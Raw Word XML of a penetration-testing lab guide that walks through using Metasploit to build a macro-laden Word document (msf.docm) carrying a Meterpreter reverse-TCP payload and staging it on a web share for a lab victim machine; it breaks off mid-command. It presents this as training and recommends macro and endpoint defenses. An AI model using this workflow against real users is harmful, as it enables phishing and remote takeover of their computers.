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8895E6" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc228545420"/>
      <w:r w:rsidRPr="00F00D26">
        <w:t>Lab 7-01: Exploiting Microsoft Office Macros</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="54EB5E59" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc228545421"/>
      <w:r w:rsidRPr="00F00D26">
        <w:t>Scenario</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="648F70F5" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ApexSecure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Technologies, a cybersecurity consulting organization, has been contracted to evaluate the security posture of a company’s remote workforce. During your reconnaissance and social engineering assessment, you identified that employees frequently exchange documents through email and collaboration platforms without verifying the source or authenticity of attachments. The company also lacks strict macro security policies and endpoint monitoring, which could allow attackers to execute malicious scripts embedded in documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED4975" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Your objective is to simulate a controlled phishing and exploitation scenario by creating a malicious Microsoft Office document containing a macro payload. This document will be delivered to a target system to demonstrate how attackers can gain unauthorized remote access when users enable macros. The goal of this exercise is to highlight the risks of weak email filtering, lack of macro security configurations, insufficient user awareness, and absence of endpoint protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43280145" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Based on your findings, you will recommend secure email gateway implementation, disabling macros by default, enforcing application whitelisting, deploying Endpoint Detection and Response (EDR) solutions, and conducting regular security awareness training to reduce the risk of macro-based attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C57FF7" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc228545422"/>
      <w:r w:rsidRPr="00F00D26">
        <w:t>Solution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="63CB2701" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ApexSecure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Technologies hired you as a Certified Penetration Tester to perform a controlled security assessment of the organization’s remote user environment. The IT administrator assigns you the task of demonstrating how attackers can exploit human behavior and weak macro security settings to gain remote access to employee laptops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A4505F" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Many employees in the organization work remotely and regularly open documents received through email or cloud storage. The IT team wants to educate employees about the risks of enabling macros in Microsoft Office documents, especially when the file originates from unknown or untrusted sources. If a malicious document is opened and macros are enabled, it can allow attackers to execute unauthorized code, gain remote system access, and move laterally across the network. This could lead to data breaches, operational disruption, and reputational damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ABFB6B" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this lab, a macro payload generator and listener setup are used to simulate a real-world attack. The malicious Microsoft Office document is crafted to include embedded macro code that executes when the user enables macros. Once executed, the macro establishes a reverse connection from the victim system to the attacker’s machine, allowing remote command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD90678" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The purpose of this exercise is to demonstrate the importance of user awareness, macro security policies, email filtering, and endpoint monitoring solutions. The organization can mitigate such risks by disabling macros by default, restricting script execution, implementing advanced threat detection, and providing continuous cybersecurity training to employees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DA1831" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  In this lab, we use two virtual machines: Kali Linux and Windows 10. The Kali Linux, as an attacker machine, has an IP address of </w:t>
      </w:r>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168.100.20</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">. The Windows 10, as a victim machine, has an IP address of </w:t>
      </w:r>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168.100.10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">. When you perform this lab, use your virtual machine IP addresses, not the lab IP addresses. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9017"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w14:paraId="0B7D4C9A" w14:textId="77777777" w:rsidTr="009A3A3B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5EDEC72C" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Turn on </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">and </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 10 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">virtual machines, then switch to the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> virtual machine. Open the Terminal and execute the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>su</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to run programs with root privileges. Then execute the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to open the Metasploit console.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="238BC5BE" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FE3E642" wp14:editId="65056ECE">
                  <wp:extent cx="4711784" cy="3431402"/>
                  <wp:effectExtent l="19050" t="19050" r="12700" b="17145"/>
                  <wp:docPr id="481882135" name="Picture 48188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716192" cy="3434612"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="442DCCEF" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Execute the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>search word macro</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to search for modules related to Microsoft Office Word.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C1BCE88"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1C78C65B" wp14:editId="605E4BA7">
                  <wp:extent cx="4476750" cy="2107202"/>
                  <wp:effectExtent l="19050" t="19050" r="19050" b="26670"/>
                  <wp:docPr id="481882136" name="Picture 48188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88207" cy="2112595"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="41CF0BDA" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Select </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>option 2</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> because this option 2 exactly match we need related to Microsoft Office Word. To select option 2, execute the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>use 2</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> command.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F0678DF" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C892128" wp14:editId="53C9CD0D">
                  <wp:extent cx="4735190" cy="2228850"/>
                  <wp:effectExtent l="19050" t="19050" r="27940" b="19050"/>
                  <wp:docPr id="481882137" name="Picture 48188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8473" cy="2230396"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7657D235" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Execute the following command: </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>set payload windows/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to set Windows Meterpreter reverse TCP payload for an attack. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22283B3C"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7FCC5D89" wp14:editId="5E2D4D99">
                  <wp:extent cx="4370947" cy="2057400"/>
                  <wp:effectExtent l="19050" t="19050" r="10795" b="19050"/>
                  <wp:docPr id="481882139" name="Picture 48188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5856" cy="2059711"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C75298F" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Execute the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>show options</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to display all the configurable parameters. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35C85F11"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0B06D81A" wp14:editId="209D180B">
                  <wp:extent cx="4476750" cy="2483116"/>
                  <wp:effectExtent l="19050" t="19050" r="19050" b="12700"/>
                  <wp:docPr id="481882140" name="Picture 48188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479821" cy="2484819"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="62F3DC6D" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">6. Execute the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>run</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to create a payload. We have successfully created a msf.docm payload. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="405C25DA" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B0131F" wp14:editId="0EDA5DC9">
                  <wp:extent cx="4665482" cy="3171825"/>
                  <wp:effectExtent l="19050" t="19050" r="20955" b="9525"/>
                  <wp:docPr id="481882141" name="Picture 48188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668801" cy="3174081"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A24F762" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>7. Execute the below-provided commands to create a directory or shared folder at the location (/var/www/html) with the required access permission. So, we will use the same directory or shared folder to share msf.docm with the victim machine.</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="8791"/>
            </w:tblGrid>
            <w:tr w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w14:paraId="777BC1D9" w14:textId="77777777" w:rsidTr="009A3A3B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="8791" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
                </w:tcPr>
                <w:p w14:paraId="6733469D" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
                  <w:pPr>
                    <w:spacing w:before="120"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>mkdir</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> /var/www/html/share</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3528D0F9" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
                  <w:pPr>
                    <w:spacing w:before="120"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>chmod</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -R 755 /var/www/html/share</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="79E5B56C" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
                  <w:pPr>
                    <w:spacing w:before="120"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>chown</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -R </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>www-</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
